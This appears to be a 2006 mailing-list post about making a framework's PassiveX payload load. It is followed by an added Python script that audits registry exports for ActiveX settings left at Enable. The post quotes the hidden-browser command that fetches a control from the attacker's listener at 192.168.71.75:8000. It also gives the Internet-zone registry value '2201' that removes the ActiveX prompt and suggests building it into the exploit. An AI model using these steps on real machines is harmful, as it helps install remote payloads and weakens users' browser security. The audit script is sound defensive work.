[framework] Using the PassiveX payload
Feature Meister
featuremeister at googlemail.com
Fri May 5 11:18:44 CDT 2006
Hi,
the dll does not get downloaded into %WINDIR%\Downloaded Program Files.
After some more troubleshooting and debugging (with process explorer)
I found out that the hidden IE is started with "...\iexplore.exe -new
http://192.168.71.75:8000/".
So I tried this one from a regular command line.
Result: IE prevented an ActiveX Control from being loaded and executed
automatically. Instead I was presented with a pop-up and the usual IE
information bar.
I then looked at the security settings of Internet-Zone. Besides
"Automatic prompting for ActiveX controls" everything was set so that
the control would execute without asking.
However the above setting was set to "Disable". I changed it to
"Enable" according to the helpful help dialog ;-) and tried it again:
it works!
The required setting in
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
would be:
"2201"=dword:00000000
Probably this could be added to the actual exploit code?
Cheers,
Marco
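
A check for the weakened state described in the message above, as an added example that is not part of the original post or of the framework: it scans a registry export (assumed already decoded to text) and reports Internet-zone ActiveX actions that are set to Enable. The action IDs other than 2201 are additions made here, and the sample export is constructed.

```python
import re

# URL action IDs for ActiveX behaviour in an IE security zone.
# Stored values: 0 = Enable, 1 = Prompt, 3 = Disable.
# Only 2201 comes from the post; the other IDs are added for this example.
ACTIVEX_ACTIONS = {
    "1001": "Download signed ActiveX controls",
    "1004": "Download unsigned ActiveX controls",
    "1200": "Run ActiveX controls and plug-ins",
    "1201": "Initialize and script ActiveX controls not marked as safe",
    "2201": "Automatic prompting for ActiveX controls",
}
INTERNET_ZONE = r"\internet settings\zones\3"  # zone 3 = Internet
SECTION = re.compile(r"^\[(?P<key>[^\]]+)\]$")
DWORD = re.compile(r'^"(?P<name>[0-9A-Fa-f]{4})"=dword:(?P<val>[0-9A-Fa-f]{8})$')

def audit_reg_export(text):
    """Return (key, action_id, description) for each ActiveX action set to Enable in zone 3."""
    findings, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION.match(line)
        if m:
            key = m.group("key")  # remember which key the following values belong to
            continue
        m = DWORD.match(line)
        if not m or key is None or not key.lower().endswith(INTERNET_ZONE):
            continue
        name = m.group("name").upper()
        if name in ACTIVEX_ACTIONS and int(m.group("val"), 16) == 0:
            findings.append((key, name, ACTIVEX_ACTIONS[name]))
    return findings

# Constructed sample export (not taken from a real host).
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"2201"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1001"=dword:00000001
"1004"=dword:00000003
"1200"=dword:00000000
"2201"=dword:00000000
'''

if __name__ == "__main__":
    for key, action, desc in audit_reg_export(SAMPLE):
        print(f"{key}: {action} ({desc}) is set to Enable")
```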